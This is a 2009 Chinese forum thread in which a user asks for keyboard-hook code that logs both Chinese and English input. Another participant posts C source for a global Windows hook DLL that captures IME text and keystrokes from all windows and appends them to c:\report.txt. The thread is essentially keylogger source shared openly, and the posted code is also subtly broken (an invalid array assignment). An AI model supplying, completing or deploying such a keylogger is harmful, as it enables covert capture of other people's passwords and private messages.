社区
进程/线程/DLL
帖子详情
小弟跪求能记录中英文的键盘果子代码
lysddp
2009-06-14 12:23:21
哪位好心能给我传一下可用的键盘钩子代码,要 能记录中英文的。找了以个晚上一般情况下只能记录英文的,实在太无语了。
QQ邮箱吧: 252225136@QQ.COM
...全文
41
5
打赏
收藏
小弟跪求能记录中英文的键盘果子代码
哪位好心能给我传一下可用的键盘钩子代码,要 能记录中英文的。找了以个晚上一般情况下只能记录英文的,实在太无语了。 QQ邮箱吧: 252225136@QQ.COM
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
5 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
driverstudent
2009-06-15
打赏
举报
回复
mark
hackwolfoscar
2009-06-14
打赏
举报
回复
[Quote=引用 1 楼 dfpgb 的回复:]
用钩子记录中文好像是有难度呵?有人说说思路么?
[/Quote]
没有任何难度。
截获到当前输入法就可以了
dfpgb
2009-06-14
打赏
举报
回复
用钩子记录中文好像是有难度呵?有人说说思路么?
lysddp
2009-06-14
打赏
举报
回复
我这里倒是有找到一个代码,用对话框能正确的输出代码,但是保存到文件里面的时候却是乱码,谁能帮我看下么:
#include "windows.h"
#include "imm.h"
#include "stdio.h"
#define HOOK_API __declspec(dllexport)
char temp[20];
HHOOK g_hHook = NULL; //hook句柄
HINSTANCE g_hHinstance = NULL; //程序句柄
LRESULT CALLBACK MessageProc(int nCode,WPARAM wParam,LPARAM lParam)
{
LRESULT lResult = CallNextHookEx(g_hHook, nCode, wParam, lParam);
PMSG pmsg = (PMSG)lParam;
if (nCode == HC_ACTION && wParam == PM_REMOVE)
{
HIMC hIMC;
HWND hWnd=pmsg->hwnd;
DWORD dwSize;
char ch;
char lpstr[20];
memset(temp,0,20);
switch (pmsg->message)
{
case WM_IME_COMPOSITION:
{
if(pmsg->lParam & GCS_RESULTSTR)
{
//先获取当前正在输入的窗口的输入法句柄
hIMC = ImmGetContext(hWnd);
if (!hIMC)
{
//MessageBox(NULL, "ImmGetContext", "ImmGetContext", MB_OK);
}
// 先将ImmGetCompositionString的获取长度设为0来获取字符串大小.
dwSize = ImmGetCompositionString(hIMC, GCS_RESULTSTR, NULL, 0);
// 缓冲区大小要加上字符串的NULL结束符大小,
// 考虑到UNICODE
dwSize += sizeof(WCHAR);
memset(lpstr, 0, 20);
// 再调用一次.ImmGetCompositionString获取字符串
ImmGetCompositionString(hIMC, GCS_RESULTSTR, lpstr, dwSize);
//现在lpstr里面即是输入的汉字了。你可以处理lpstr,当然也可以保存为文件...
MessageBox(NULL, lpstr, lpstr, MB_OK);
temp=lpstr;
ImmReleaseContext(hWnd, hIMC);
}
}
break;
case WM_CHAR: //截获发向焦点窗口的键盘消息
{
FILE* f1;
f1=fopen("c:\\report.txt","a+");
if(strlen(temp)>0)
{
fwrite(temp,1,sizeof(temp),f1);
fwrite("!!!",1,3,f1);
memset(temp,0,20);
}
else
{ch=(char)(pmsg->wParam);
fwrite(&ch,1,1,f1);}
fclose(f1);
}
break;
}
}
return(lResult);
}
HHOOK InstallHook()
{
g_hHook = SetWindowsHookEx(WH_GETMESSAGE,(HOOKPROC)MessageProc,g_hHinstance,0);
return g_hHook;
}
BOOL UnHook(HHOOK g_hHook)
{
return UnhookWindowsHookEx(g_hHook);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
g_hHinstance=(HINSTANCE)hModule;
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
UnHook(g_hHook);
break;
}
return TRUE;
}
neohope
2009-06-14
打赏
举报
回复
英文用 键盘钩子
中文要用 WM_IME_COMPOSITION
但是这样的话,记录中文的时候,也会把输入的按键记录下来吧
合并
果子
--c
题目: 在一个果园里,达达已经将所有的
果子
打了下来,而且按
果子
的不同种类分成了不同的堆。 达达决定把所有的
果子
合成一堆。 每一次合并,达达可以把两堆
果子
合并到一起,消耗的体力等于两堆
果子
的重量之和。 可以看出,所有的
果子
经过n-1次合并之后,就只剩下一堆了。 达达在合并
果子
时总共消耗的体力等于每次合并所耗体力之和。 因为还要花大力气把这些
果子
搬回家,所以达达在合并
果子
时要尽可能地节省体力。 假定每...
合并
果子
题目大意是:有n堆
果子
,每堆
果子
的重量分别是:a[1],a[2],...,a[n]。每一次合并,可以把两堆
果子
合并到一起,直到合并为一堆,每次消耗的体力等于两堆
果子
的重量之和。在合并
果子
时总共消耗的体力等于每次合并所耗体力之和。现给出n和n堆
果子
的重量,求最小的体力耗费值是多少? 分析:其实这道题很简单,就是把每一堆
果子
排一个序,每次取出最小的两堆合并就可以了。
代码
如下:
【堆】合并
果子
链接 https://www.luogu.org/problemnew/show/P1090 大意 给定nnn个
果子
,每次可以合并两个
果子
为一个
果子
,花费它们的代价和,求合并成一个
果子
的最低代价 思路 用堆模拟合并 或者用数组O(n)O(n)O(n)合并 堆
代码
#include<cstdio> #define swap(a,b) {a^=b;b=a^b;a...
信息学奥赛一本通 1369:合并
果子
(fruit) | 1836:【04NOIP提高组】合并
果子
| 洛谷 P1090 [NOIP2004 提高组] 合并
果子
复杂度内取到所有果堆中数量最小的一堆,也就是取当前多个数字中的最小值,需要用到堆(heap)这一数据结构,C++ STL中提供了以堆为原理的优先队列(priority_queue),可以使用该容器求数字中的最小值。将优先队列设为小顶堆,将n个数字加入到优先队列之中,每次出队两个数字,出队的两个数字就是最小的两个数字,将这两个数字加和,即为合并两堆
果子
。如果a, b两堆合为一堆,则可以画一个根结点g表示a,b合并后的果堆,这个结点的左孩子是a,右孩子是b。下图中,冒号后面的数字表示
果子
数量。
c语言合并
果子
思路解释,C语言 合并
果子
(类哈夫曼树)问题
题目描述在一个果园里,多多已经将所有的
果子
打了下来,而且按
果子
的不同种类分成了不同的堆。多多决定把所有
果子
合成一堆。每一次合并,多多可以把两堆
果子
合并到一起,消耗的体力等于两堆
果子
的重量之和。可以看出,所有的
果子
经过n-1次合并之后就剩下一堆了。多多在合并
果子
时总消耗的体力等于每次合并所耗体力之和。因为还要花大力气把这些
果子
搬回家,所以多多在合并
果子
时要尽可能地节省体力。假定每个
果子
重量都为1,并...
进程/线程/DLL
15,471
社区成员
49,182
社区内容
发帖
与我相关
我的任务
进程/线程/DLL
VC/MFC 进程/线程/DLL
复制链接
扫一扫
分享
社区描述
VC/MFC 进程/线程/DLL
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章